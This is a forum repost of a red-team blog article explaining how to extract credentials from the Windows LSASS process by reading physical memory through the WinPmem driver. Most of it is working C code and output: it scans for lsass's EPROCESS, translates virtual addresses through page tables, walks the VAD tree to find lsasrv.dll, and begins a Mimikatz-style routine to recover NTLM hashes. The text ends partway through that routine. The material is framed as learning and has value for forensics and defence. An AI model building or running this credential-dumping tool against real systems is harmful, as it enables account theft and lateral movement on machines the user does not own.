Jump to content

Nytro

Administrators
  • Posts

    18664
  • Joined

  • Last visited

  • Days Won

    681

Everything posted by Nytro

  1. A physical graffiti of LSASS: getting credentials from physical memory for fun and learning May 08, 2021 Adepts of 0xCC Dear Fellowlship, today’s homily is about how one of our owls began his own quest through the lands of physical memory to find the credentials keys to paradise. Please, take a seat and listen to the story. Prayers at the foot of the Altar a.k.a. disclaimer Our knowledge about the topic discussed in this article is limited, as we stated in the tittle we did this work just for learning purposes. If you spot incorrections/misconceptions, please ping us at twitter so we can fix it. For a more accurate information (and deep explanations), please check the book “Windows Internals” (Pavel Yosifovich, Alex Ionescu, Mark E. Russinovich & David A. Solomon). Also well-known forensic tools are a good source of information (for example Volatility) Other important thing to keep in mind: the windows version used here is Windows 10 2009 20H2 (October 2020 Update) Preamble Hunting for juicy information inside dumps of physical memory is something that regular forensic tools does by default. Even cheaters have been exploring this way in the past to build wallhacks: read physical memory, find your desired game process and look for the player information structs. From a Red Teaming/Pentesting optics, this approach has been explored too in order to obtain credentials from the lsass process in live machines during engagements. For example, in 2020 F-Secure published an article titled “Rethinking credential theft” and released a tool called “PhysMem2Profit”. In their article/tool they use WinPmem driver to read physical memory (a vulnerable driver with a read primitive would work too), creating a bridge with sockets between the target machine and the pentester machine, so they can create a minidump of lsass process that is compatible with Mimikatz with the help of Rekall. Working schema (from 'Rethinking Credential Theft') The steps they follow are: Expose the physical memory of the target over a TCP port. Connect to the TCP port and mount the physical memory as a file. Analyze the mounted memory with the help of the Rekall framework and create a minidump of LSASS. Run the minidump through Mimikatz and retrieve credential material. In our humble opinion, this approach is too convoluted and contains unnecessary steps. Also creating a socket between the two machines does not look fine to us. So… here comes our idea: let’s try to loot lsass from physical memory staying in the same machine and WITHOUT externals tools (like they did with rekall). It is a good opportunity to learn new things!kd It’s dangerous to go alone! Take this. As in any quest, we first need a map and a compass to find the treasure because the land of physical memory is dangerous and full of terrors. We can read arbitrary physical memory with WinPem or a driver vulnerable with a read primitive, but… How can we find the process memory? Well, our map is the AVL-tree that contains the VADs info and our compass is the EPROCESS struct. Let’s explain this! The Memory Manager needs to keep track of which virtual addresses has been reserved in the process’ address space. This information is contained in structs called “VAD” (Virtual Address Descriptor) and they are placed inside an AVL-tree (an AVL-tree is a self-balancing binary search tree). The tree is our map: if we find the first tree’s node we can start to walk it and retrieve all the VADs, and consequently we would get the knowledge of how the process memory is distributed (also, the VAD provides more useful information as we are going to see later). But… how can we find this tree? Well, we need the compass. And our compass is the EPROCESS. This structure contains a pointer to the tree (field VadRoot) and the number of nodes (VadCount😞 //0xa40 bytes (sizeof) struct _EPROCESS { struct _KPROCESS Pcb; //0x0 struct _EX_PUSH_LOCK ProcessLock; //0x438 VOID* UniqueProcessId; //0x440 struct _LIST_ENTRY ActiveProcessLinks; //0x448 struct _EX_RUNDOWN_REF RundownProtect; //0x458 //(...) struct _RTL_AVL_TREE VadRoot; //0x7d8 VOID* VadHint; //0x7e0 ULONGLONG VadCount; //0x7e8 //(...) Finding this structure in physical memory is easy. In the article “CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver”, @Jackson_T uses a mask to find this structure. As we know some data (like the PID, the process name or the Priority value) we can use this as a signature and search the whole physical memory until we match it. We’ll know the name and PID for each process we’re targeting, so the UniqueProcessId and ImageFileName fields should be good candidates. Problem is that we won’t be able to accurately predict the values for every field between them. Instead, we can define two needles: one that has ImageFileName and another that has UniqueProcessId. We can see that their corresponding byte buffers have predictable outputs. (From Jackson_T post) So, we can search for our masks and then apply relative offsets to read the fields that we are interested in: int main(int argc, char** argv) { WINPMEM_MEMORY_INFO info; DWORD size; BOOL result = FALSE; int i = 0; LARGE_INTEGER large_start; DWORD found = 0; printf("[+] Getting WinPmem handle...\t"); pmem_fd = CreateFileA("\\\\.\\pmem", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (pmem_fd == INVALID_HANDLE_VALUE) { printf("ERROR!\n"); return -1; } printf("OK!\n"); RtlZeroMemory(&info, sizeof(WINPMEM_MEMORY_INFO)); printf("[+] Getting memory info...\t"); result = DeviceIoControl(pmem_fd, IOCTL_GET_INFO, NULL, 0, // in (char*)&info, sizeof(WINPMEM_MEMORY_INFO), // out &size, NULL); if (!result) { printf("ERROR!\n"); return -1; } printf("OK!\n"); printf("[+] Memory Info:\n"); printf("\t[-] Total ranges: %lld\n", info.NumberOfRuns.QuadPart); for (i = 0; i < info.NumberOfRuns.QuadPart; i++) { printf("\t\tStart 0x%08llX - Length 0x%08llx\n", info.Run[i].BaseAddress.QuadPart, info.Run[i].NumberOfBytes.QuadPart); max_physical_memory = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart; } printf("\t[-] Max physical memory 0x%08llx\n", max_physical_memory); printf("[+] Scanning memory... "); for (i = 0; i < info.NumberOfRuns.QuadPart; i++) { start = info.Run[i].BaseAddress.QuadPart; end = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart; while (start < end) { unsigned char* largebuffer = (unsigned char*)malloc(BUFF_SIZE); DWORD to_write = (DWORD)min((BUFF_SIZE), end - start); DWORD bytes_read = 0; DWORD bytes_written = 0; large_start.QuadPart = start; result = SetFilePointerEx(pmem_fd, large_start, NULL, FILE_BEGIN); if (!result) { printf("[!] ERROR! (SetFilePointerEx)\n"); } result = ReadFile(pmem_fd, largebuffer, to_write, &bytes_read, NULL); EPROCESS_NEEDLE needle_root_process = {"lsass.exe"}; PBYTE needle_buffer = (PBYTE)malloc(sizeof(EPROCESS_NEEDLE)); memcpy(needle_buffer, &needle_root_process, sizeof(EPROCESS_NEEDLE)); int offset = 0; offset = memmem((PBYTE)largebuffer, bytes_read, needle_buffer, sizeof(EPROCESS_NEEDLE)); // memmem() is the same used by Jackson_T in his post if (offset >= 0) { if (largebuffer[offset + 15] == 2) { //Priority Check if (largebuffer[offset - 0x168] == 0x70 && largebuffer[offset - 0x167] == 0x02) { //PID check, hardcoded for PoC, we can take in runtime but... too lazy :P printf("signature match at 0x%08llx!\n", offset + start); printf("[+] EPROCESS is at 0x%08llx [PHYSICAL]\n", offset - 0x5a8 + start); memcpy(&DirectoryTableBase, largebuffer + offset - 0x5a8 + 0x28, sizeof(ULONGLONG)); printf("\t[*] DirectoryTableBase: 0x%08llx\n", DirectoryTableBase); printf("\t[*] VadRoot is at 0x%08llx [PHYSICAL]\n", start + offset - 0x5a8 + 0x7d8); memcpy(&VadRootPointer, largebuffer + offset - 0x5a8 + 0x7d8, sizeof(ULONGLONG)); VadRootPointer = VadRootPointer; printf("\t[*] VadRoot points to 0x%08llx [VIRTUAL]\n", VadRootPointer); memcpy(&VadCount, largebuffer + offset - 0x5a8 + 0x7e8, sizeof(ULONGLONG)); printf("\t[*] VadCount is %lld\n", VadCount); free(needle_buffer); free(largebuffer); found = 1; break; } } } start += bytes_read; free(needle_buffer); free(largebuffer); } if (found != 0) { break; } } return 0; } And here is the ouput: [+] Getting WinPmem handle... OK! [+] Getting memory info... OK! [+] Memory Info: [-] Total ranges: 4 Start 0x00001000 - Length 0x0009e000 Start 0x00100000 - Length 0x00002000 Start 0x00103000 - Length 0xdfeed000 Start 0x100000000 - Length 0x20000000 [-] Max physical memory 0x120000000 [+] Scanning memory... signature match at 0x271c3628! [+] EPROCESS is at 0x271c3080 [PHYSICAL] [*] DirectoryTableBase: 0x29556000 [*] VadRoot is at 0x271c3858 [PHYSICAL] [*] VadRoot points to 0xffffa48bb0147290 [VIRTUAL] [*] VadCount is 165 Maybe you are wondering why are we interested in the field DirectoryTableBase. The thing is: from our point of view we only can work with physical memory, we do not “understand” what a virtual address is because to us they are “out of context”. We know about physical memory and offsets, not about virtual addresses bounded to a process. But we are going to deal with pointers to virtual memory so… we need a way to translate them. Lost in translation I like to compare virtual addresses with the code used in libraries to know the location of a book, where the first digits indicates the hall, the next the bookshelf, the column and finally the shelf where the book lies. Our virtual address is in some way just like the library code: it contains different indexes. Instead of talking about halls, columns or shelves, we have Page-Map-Level4 (PML4E), Page-Directory-Pointer (PDPE), Page-Directory (PDE), Page-Table (PTE) and the Page Physical Offset. From AMD64 Architecture Programmer’s Manual Volume 2. Those are the page levels for a 4KB page, for 2MB we have PML4E, PDPE, PDE and the offset. We can verify this information using kd and the command !vtop with different processes: For 4KB (Base 0x26631000, virtual adress to translate 0xffffc987034fd330): lkd> !vtop 26631000 0xffffc987034fd330 Amd64VtoP: Virt ffffc987034fd330, pagedir 0000000026631000 Amd64VtoP: PML4E 0000000026631c98 Amd64VtoP: PDPE 00000000046320e0 Amd64VtoP: PDE 0000000100a1c0d0 Amd64VtoP: PTE 000000001fa3f7e8 Amd64VtoP: Mapped phys 0000000026da8330 Virtual address ffffc987034fd330 translates to physical address 26da8330. For 2MB (Base 0x1998D000, virtual address to translate 0xffffaa83f4b35640): lkd> !vtop 1998D000 ffffaa83f4b35640 Amd64VtoP: Virt ffffaa83f4b35640, pagedir 000000001998d000 Amd64VtoP: PML4E 000000001998daa8 Amd64VtoP: PDPE 0000000004631078 Amd64VtoP: PDE 0000000004734d28 Amd64VtoP: Large page mapped phys 0000000108d35640 Virtual address ffffaa83f4b35640 translates to physical address 108d35640. What is it doing under the hood? Well, the picture of a 4KB page follows this explanation: if you turn the virtual address to its binary representation, you can split it into the indexes of each page level. So, imagine we want to translate the virtual address 0xffffa48bb0147290 and the process page base is 0x29556000 (let’s assume is a 4kb page, later we will explain how to know it). lkd> .formats ffffa48bb0147290 Evaluate expression: Hex: ffffa48b`b0147290 Decimal: -100555115171184 Octal: 1777775110566005071220 Binary: 11111111 11111111 10100100 10001011 10110000 00010100 01110010 10010000 Chars: ......r. Time: ***** Invalid FILETIME Float: low -5.40049e-010 high -1.#QNAN Double: -1.#QNAN Now we can split the bits in chunks: 12 bits for the Page Physical Offset, 9 for the PTE, 9 for the PDE, 9 for the PDPE and 9 for the PML4E: 1111111111111111 101001001 000101110 110000000 101000111 001010010000 Next we are going to take the chunk for PML4E and multiply by 0x8: lkd> .formats 0y101001001 Evaluate expression: Hex: 00000000`00000149 Decimal: 329 Octal: 0000000000000000000511 Binary: 00000000 00000000 00000000 00000000 00000000 00000000 00000001 01001001 Chars: .......I Time: Thu Jan 1 01:05:29 1970 Float: low 4.61027e-043 high 0 Double: 1.62548e-321 0x149 * 0x8 = 0xa48 Now we can use it as an offset: just add this value to the page base (0x29556a48). Next, read the physical memory at that location: lkd> !dq 29556a48 #29556a48 0a000000`04632863 00000000`00000000 #29556a58 00000000`00000000 00000000`00000000 #29556a68 00000000`00000000 00000000`00000000 #29556a78 00000000`00000000 00000000`00000000 #29556a88 00000000`00000000 00000000`00000000 #29556a98 00000000`00000000 00000000`00000000 #29556aa8 00000000`00000000 00000000`00000000 #29556ab8 00000000`00000000 00000000`00000000 Turn to zero the last 3 numbers, so we have 0x4632000. Now repeat the operation of multiplying the chunk of bits: kd> .formats 0y000101110 Evaluate expression: Hex: 00000000`0000002e Decimal: 46 Octal: 0000000000000000000056 Binary: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00101110 Chars: ........ Time: Thu Jan 1 01:00:46 1970 Float: low 6.44597e-044 high 0 Double: 2.2727e-322 So… 0x4632000 + (0x2e * 0x8) == 0x4632170. Read the physical memory at this point: lkd> !dq 4632170 # 4632170 0a000000`04735863 00000000`00000000 # 4632180 00000000`00000000 00000000`00000000 # 4632190 00000000`00000000 00000000`00000000 # 46321a0 00000000`00000000 00000000`00000000 # 46321b0 00000000`00000000 00000000`00000000 # 46321c0 00000000`00000000 00000000`00000000 # 46321d0 00000000`00000000 00000000`00000000 # 46321e0 00000000`00000000 00000000`00000000 Just repeat the same operation until the end (except for the last 12 bits, those no need to by multiplied by 0x8) and you have translated successfully your virtual address! Don’t trust me? Check it! kd> !vtop 0x29556000 0xffffa48bb0147290 Amd64VtoP: Virt ffffa48bb0147290, pagedir 0000000029556000 Amd64VtoP: PML4E 0000000029556a48 Amd64VtoP: PDPE 0000000004632170 Amd64VtoP: PDE 0000000004735c00 Amd64VtoP: PTE 0000000022246a38 Amd64VtoP: Mapped phys 000000001645b290 Virtual address ffffa48bb0147290 translates to physical address 1645b290. Ta-dá! Here is a sample function that we are going to use to translate virtual addresses (4Kb and 2Mb) to physical (ugly as hell, but works): ULONGLONG v2p(ULONGLONG vaddr) { BOOL result = FALSE; DWORD bytes_read = 0; LARGE_INTEGER PML4E; LARGE_INTEGER PDPE; LARGE_INTEGER PDE; LARGE_INTEGER PTE; ULONGLONG SIZE = 0; ULONGLONG phyaddr = 0; ULONGLONG base = 0; base = DirectoryTableBase; PML4E.QuadPart = base + extractBits(vaddr, 9, 39) * 0x8; //printf("[DEBUG Virtual Address: 0x%08llx]\n", vaddr); //printf("\t[*] PML4E: 0x%x\n", PML4E.QuadPart); result = SetFilePointerEx(pmem_fd, PML4E, NULL, FILE_BEGIN); PDPE.QuadPart = 0; result = ReadFile(pmem_fd, &PDPE.QuadPart, 7, &bytes_read, NULL); PDPE.QuadPart = extractBits(PDPE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 30) * 0x8; //printf("\t[*] PDPE: 0x%08llx\n", PDPE.QuadPart); result = SetFilePointerEx(pmem_fd, PDPE, NULL, FILE_BEGIN); PDE.QuadPart = 0; result = ReadFile(pmem_fd, &PDE.QuadPart, 7, &bytes_read, NULL); PDE.QuadPart = extractBits(PDE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 21) * 0x8; //printf("\t[*] PDE: 0x%08llx\n", PDE.QuadPart); result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN); PTE.QuadPart = 0; result = ReadFile(pmem_fd, &SIZE, 8, &bytes_read, NULL); if (extractBits(SIZE, 1, 63) == 1) { result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL); phyaddr = extractBits(phyaddr, 56, 20) * 0x100000 + extractBits(vaddr, 21, 0); //printf("\t[*] Physical Address: 0x%08llx\n", phyaddr); return phyaddr; } result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN); PTE.QuadPart = 0; result = ReadFile(pmem_fd, &PTE.QuadPart, 7, &bytes_read, NULL); PTE.QuadPart = extractBits(PTE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 12) * 0x8; //printf("\t[*] PTE: 0x%08llx\n", PTE.QuadPart); result = SetFilePointerEx(pmem_fd, PTE, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL); phyaddr = extractBits(phyaddr, 56, 12) * 0x1000 + extractBits(vaddr, 12, 0); //printf("\t[*] Physical Address: 0x%08llx\n", phyaddr); return phyaddr; } Well, now we can work with virtual addresses. Let’s move! Lovin’ Don’t Grow On Trees The next task to solve is to walk the AVL tree and extract all the VADs. Let’s check the VadRoot pointer: lkd> dq ffffa48bb0147290 ffffa48b`b0147290 ffffa48b`b0146c50 ffffa48b`b01493b0 ffffa48b`b01472a0 00000000`00000001 ff643ab1`ff643aa0 ffffa48b`b01472b0 00000000`00000707 00000000`00000000 ffffa48b`b01472c0 00000003`000003a0 00000000`00000000 ffffa48b`b01472d0 00000000`04000000 ffffa48b`b014daa0 ffffa48b`b01472e0 ffffd100`10b56f40 ffffd100`10b56fc8 ffffa48b`b01472f0 ffffa48b`b014da28 ffffa48b`b014da28 ffffa48b`b0147300 ffffa48b`b016e081 00007ff6`43aa5002 The first thing we can see is the pointer to the left node (offset 0x00-0x07) and the pointer to the right node (0x08-0x10). We have to add them to a queue and check them later, and add their respective new children nodes, repeating this operation in order to walk the whole tree. Also combining 4 bytes from 0x18 and 1 byte from 0x20 we get the starting address of the described memory region (the ending virtual addrees is obtained combining 4 bytes from 0x1c and 1 byte from 0x21). So we can walk the whole tree doing something like: //(...) currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer if (currentNode == 0) { cursor++; continue; } reader.QuadPart = v2p(currentNode); // Get Physical Address left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node queue[last++] = left; //Add the new node //printf("[<] Left: 0x%08llx\n", left); reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node right = readPhysMemPointer(reader); //Save the pointer queue[last++] = right; //Add the new node //printf("[>] Right: 0x%08llx\n", right); // Get the start address reader.QuadPart = v2p(currentNode + 0x18); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL); reader.QuadPart = v2p(currentNode + 0x20); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL); start = (startingVpn << 12) | (startingVpnHigh << 44); // Get the end address reader.QuadPart = v2p(currentNode + 0x1c); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL); reader.QuadPart = v2p(currentNode + 0x21); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL); end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44)); //(...) Now we can retrieve all the regions of virtual memory reserved, and the limits (starting address and ending address, and by substraction the size): [+] Starting to walk _RTL_AVL_TREE... ===================[VAD info]=================== [0] (0xffffa48bb0147290) [0x7ff643aa0000-0x7ff643ab2000] (73728 bytes) [1] (0xffffa48bb0146c50) [0x1d4d2ef0000-0x1d4d2f0d000] (118784 bytes) [2] (0xffffa48bb01493b0) [0x7ff845000000-0x7ff845027000] (159744 bytes) [3] (0xffffa48bb0179300) [0x80cbf00000-0x80cbf80000] (524288 bytes) [4] (0xffffa48bb01795d0) [0x1d4d36a0000-0x1d4d36a1000] (4096 bytes) [5] (0xffffa48bb01a1390) [0x7ff844540000-0x7ff84454c000] (49152 bytes) But VADs contains other interesting metadata. For example, if the region is reserved for a image file, we can retrieve the path of that file. This is important for us because we want to locate the loaded lsasrv.dll inside the lsass process because from here is where we are going to loot credentials (imitating the Mimikatz’s sekurlsa::msv to get NTLM hashes). Let’s take a ride through the __mmvad struct (follow the arrows!): lkd> dt nt!_mmvad 0xffffe786`ed185cf0 +0x000 Core : _MMVAD_SHORT +0x040 u2 : <anonymous-tag> +0x048 Subsection : 0xffffe786`ed185d60 _SUBSECTION <=========== +0x050 FirstPrototypePte : (null) +0x058 LastContiguousPte : 0x00000002`00000006 _MMPTE +0x060 ViewLinks : _LIST_ENTRY [ 0x00000006`00000029 - 0x00000000`00000000 ] +0x070 VadsProcess : 0xffffe786`ed185c70 _EPROCESS +0x078 u4 : <anonymous-tag> +0x080 FileObject : 0xffffe786`ed185d98 _FILE_OBJECT kd> dt nt!_SUBSECTION 0xffffe786`ed185d60 +0x000 ControlArea : 0xffffe786`ed185c70 _CONTROL_AREA <============================== +0x008 SubsectionBase : 0xffffae0e`cab53f58 _MMPTE +0x010 NextSubsection : 0xffffe786`ed185d98 _SUBSECTION +0x018 GlobalPerSessionHead : _RTL_AVL_TREE +0x018 CreationWaitList : (null) +0x018 SessionDriverProtos : (null) +0x020 u : <anonymous-tag> +0x024 StartingSector : 0x2b +0x028 NumberOfFullSectors : 0x2c +0x02c PtesInSubsection : 6 +0x030 u1 : <anonymous-tag> +0x034 UnusedPtes : 0y000000000000000000000000000000 (0) +0x034 ExtentQueryNeeded : 0y0 +0x034 DirtyPages : 0y0 lkd> dt nt!_CONTROL_AREA 0xffffe786`ed185c70 +0x000 Segment : 0xffffae0e`ce0c9f50 _SEGMENT +0x008 ListHead : _LIST_ENTRY [ 0xffffe786`ed1b1210 - 0xffffe786`ed1b1210 ] +0x008 AweContext : 0xffffe786`ed1b1210 Void +0x018 NumberOfSectionReferences : 1 +0x020 NumberOfPfnReferences : 0xf +0x028 NumberOfMappedViews : 1 +0x030 NumberOfUserReferences : 2 +0x038 u : <anonymous-tag> +0x03c u1 : <anonymous-tag> +0x040 FilePointer : _EX_FAST_REF <================= +0x048 ControlAreaLock : 0n0 +0x04c ModifiedWriteCount : 0 +0x050 WaitList : (null) +0x058 u2 : <anonymous-tag> +0x068 FileObjectLock : _EX_PUSH_LOCK +0x070 LockedPages : 1 +0x078 u3 : <anonymous-tag> So at 0xffffe786ed185c70 plus 0x40 we have a field called FilePointer and it is an EX_FAST_REF. In order to retrieve the correct pointer, we have to retrieve the pointer from this position and turn to zero the last digit: lkd> dt nt!_EX_FAST_REF 0xffffe786`ed185c70+0x40 +0x000 Object : 0xffffe786`ed19539c Void <=========================== & 0xfffffffffffffff0 +0x000 RefCnt : 0y1100 +0x000 Value : 0xffffe786`ed19539c So 0xffffe786ed19539c & 0xfffffffffffffff0 is 0xffffe786ed195390, which is a pointer to a _FILE_OBJECT struct: lkd> dt nt!_FILE_OBJECT 0xffffe786`ed195390 +0x000 Type : 0n5 +0x002 Size : 0n216 +0x008 DeviceObject : 0xffffe786`e789c060 _DEVICE_OBJECT +0x010 Vpb : 0xffffe786`e77df4c0 _VPB +0x018 FsContext : 0xffffae0e`cd2c8170 Void +0x020 FsContext2 : 0xffffae0e`cd2c83e0 Void +0x028 SectionObjectPointer : 0xffffe786`ed18e7f8 _SECTION_OBJECT_POINTERS +0x030 PrivateCacheMap : (null) +0x038 FinalStatus : 0n0 +0x040 RelatedFileObject : (null) +0x048 LockOperation : 0 '' +0x049 DeletePending : 0 '' +0x04a ReadAccess : 0x1 '' +0x04b WriteAccess : 0 '' +0x04c DeleteAccess : 0 '' +0x04d SharedRead : 0x1 '' +0x04e SharedWrite : 0 '' +0x04f SharedDelete : 0x1 '' +0x050 Flags : 0x44042 +0x058 FileName : _UNICODE_STRING "\Windows\System32\lsass.exe" <======== /!\ +0x068 CurrentByteOffset : _LARGE_INTEGER 0x0 +0x070 Waiters : 0 +0x074 Busy : 0 +0x078 LastLock : (null) +0x080 Lock : _KEVENT +0x098 Event : _KEVENT +0x0b0 CompletionContext : (null) +0x0b8 IrpListLock : 0 +0x0c0 IrpList : _LIST_ENTRY [ 0xffffe786`ed195450 - 0xffffe786`ed195450 ] +0x0d0 FileObjectExtension : (null) Finally! At offset 0x58 is an _UNICODE_STRING struct that contains the path to the image asociated with this memory region. In order to get this info, we need to parse each node found and get deep in this rollercoaster of structs, reading each pointer from the target offset. So… finally we are going to have something like: void walkAVL(ULONGLONG VadRoot, ULONGLONG VadCount) { /* Variables used to walk the AVL tree*/ ULONGLONG* queue; BOOL result; DWORD bytes_read = 0; LARGE_INTEGER reader; ULONGLONG cursor = 0; ULONGLONG count = 1; ULONGLONG last = 1; ULONGLONG startingVpn = 0; ULONGLONG endingVpn = 0; ULONGLONG startingVpnHigh = 0; ULONGLONG endingVpnHigh = 0; ULONGLONG start = 0; ULONGLONG end = 0; VAD* vadList = NULL; printf("[+] Starting to walk _RTL_AVL_TREE...\n"); queue = (ULONGLONG *)malloc(sizeof(ULONGLONG) * VadCount * 4); // Make room for our queue queue[0] = VadRoot; // Node 0 vadList = (VAD*)malloc(VadCount * sizeof(*vadList)); // Save all the VADs in an array. We do not really need it (because we can just break when the lsasrv.dll is found) but hey... maybe we want to reuse this code in the future while (count <= VadCount) { ULONGLONG currentNode; ULONGLONG left = 0; ULONGLONG right = 0; ULONGLONG subsection = 0; ULONGLONG control_area = 0; ULONGLONG filepointer = 0; ULONGLONG fileobject = 0; ULONGLONG filename = 0; USHORT pathLen = 0; LPWSTR path = NULL; // printf("Cursor [%lld]\n", cursor); currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer if (currentNode == 0) { cursor++; continue; } reader.QuadPart = v2p(currentNode); // Get Physical Address left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node queue[last++] = left; //Add the new node //printf("[<] Left: 0x%08llx\n", left); reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node right = readPhysMemPointer(reader); //Save the pointer queue[last++] = right; //Add the new node //printf("[>] Right: 0x%08llx\n", right); // Get the start address reader.QuadPart = v2p(currentNode + 0x18); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL); reader.QuadPart = v2p(currentNode + 0x20); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL); start = (startingVpn << 12) | (startingVpnHigh << 44); // Get the end address reader.QuadPart = v2p(currentNode + 0x1c); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL); reader.QuadPart = v2p(currentNode + 0x21); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL); end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44)); //Get the pointer to Subsection (offset 0x48 of __mmvad) reader.QuadPart = v2p(currentNode + 0x48); subsection = readPhysMemPointer(reader); if (subsection != 0 && subsection != 0xffffffffffffffff) { //Get the pointer to ControlArea (offset 0 of _SUBSECTION) reader.QuadPart = v2p(subsection); control_area = readPhysMemPointer(reader); if (control_area != 0 && control_area != 0xffffffffffffffff) { //Get the pointer to FileObject (offset 0x40 of _CONTROL_AREA) reader.QuadPart = v2p(control_area + 0x40); fileobject = readPhysMemPointer(reader); if (fileobject != 0 && fileobject != 0xffffffffffffffff) { // It is an _EX_FAST_REF, so we need to mask the last byte fileobject = fileobject & 0xfffffffffffffff0; //Get the pointer to path length (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the len plus null bytes is at +0x2) reader.QuadPart = v2p(fileobject + 0x58 + 0x2); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &pathLen, 2, &bytes_read, NULL); //Get the pointer to the path name (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the pointer to the buffer is +0x08) reader.QuadPart = v2p(fileobject + 0x58 + 0x8); filename = readPhysMemPointer(reader); //Save the path name path = (LPWSTR)malloc(pathLen * sizeof(wchar_t)); reader.QuadPart = v2p(filename); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, path, pathLen * 2, &bytes_read, NULL); } } } /*printf("[0x%08llx]\n", currentNode); printf("[!] Subsection 0x%08llx\n", subsection); printf("[!] ControlArea 0x%08llx\n", control_area); printf("[!] FileObject 0x%08llx\n", fileobject); printf("[!] PathLen %d\n", pathLen); printf("[!] Buffer with path name 0x%08llx\n", filename); printf("[!] Path name: %S\n", path); */ // Save the info in our list vadList[count - 1].id = count - 1; vadList[count - 1].vaddress = currentNode; vadList[count - 1].start = start; vadList[count - 1].end = end; vadList[count - 1].size = end - start; memset(vadList[count - 1].image, 0, MAX_PATH); if (path != NULL) { wcstombs(vadList[count - 1].image, path, MAX_PATH); free(path); } count++; cursor++; } //Just print the VAD list printf("\t\t===================[VAD info]===================\n"); for (int i = 0; i < VadCount; i++) { printf("[%lld] (0x%08llx) [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].id, vadList[i].vaddress, vadList[i].start, vadList[i].end, vadList[i].size); if (vadList[i].image[0] != 0) { printf(" |\n +---->> %s\n", vadList[i].image); } } printf("\t\t================================================\n"); for (int i = 0; i < VadCount; i++) { if (!strcmp(vadList[i].image, "\\Windows\\System32\\lsasrv.dll")) { // Is this our target? printf("[!] LsaSrv.dll found! [0x%08llx-0x%08llx] (%lld bytes)\n", vadList[i].start, vadList[i].end, vadList[i].size); // TODO lootLsaSrv(vadList[i].start, vadList[i].end, vadList[i].size); break; } } free(vadList); free(queue); return; } This looks like… (...) [161] (0xffffa48baf677ba0) [0x7ff8122b0000-0x7ff8122e0000] (196608 bytes) | +---->> \Windows\System32\CertPolEng.dll [162] (0xffffa48bb1f640a0) [0x7ff8183e0000-0x7ff818422000] (270336 bytes) | +---->> \Windows\System32\ngcpopkeysrv.dll [163] (0xffffa48bb1f63ce0) [0x7ff83df10000-0x7ff83df2a000] (106496 bytes) | +---->> \Windows\System32\tbs.dll [164] (0xffffa48bb1f66a80) [0x7ff83e270000-0x7ff83e2e3000] (471040 bytes) | +---->> \Windows\System32\cryptngc.dll ================================================ [!] LsaSrv.dll found! [0x7ff845130000-0x7ff8452ce000] (1695744 bytes) To recap at this point we: Can translate virtual addresses to physical Got the location of the LsaSrv.dll module inside the lsass process memory Stray Mimikatz sings Runnaway Boys This time we are only interested in retrieving NTLM Hashes, so we are going to implement something like the sekurlsa::msv from Mimikatz as PoC (once we have located the process memory, and its modules, it is trivial to imitate any functionatility from Mimikatz so I picked the quickier to implement as PoC). This is well explained in the article “Uncovering Mimikatz ‘msv’ and collecting credentials through PyKD” from Matteo Malvica, so it is redundant to explain it again here… but in essence we are going to search for signatures inside lsasrv.dll and then retrieve the info needed to locate the LogonSessionList struct and the crypto keys/IVs needed. Also another good related article to read is “Exploring Mimikatz - Part 1 - WDigest” by @xpn. As I am imitating the post from Matteo Malvica, I am going to retrieve only the cryptoblob encrypted with Triple-DES. Here is our shitty code: void lootLsaSrv(ULONGLONG start, ULONGLONG end, ULONGLONG size) { LARGE_INTEGER reader; DWORD bytes_read = 0; LPSTR lsasrv = NULL; ULONGLONG cursor = 0; ULONGLONG lsasrv_size = 0; ULONGLONG original = 0; BOOL result; ULONGLONG LogonSessionListCount = 0; ULONGLONG LogonSessionList = 0; ULONGLONG LogonSessionList_offset = 0; ULONGLONG LogonSessionListCount_offset = 0; ULONGLONG iv_offset = 0; ULONGLONG hDes_offset = 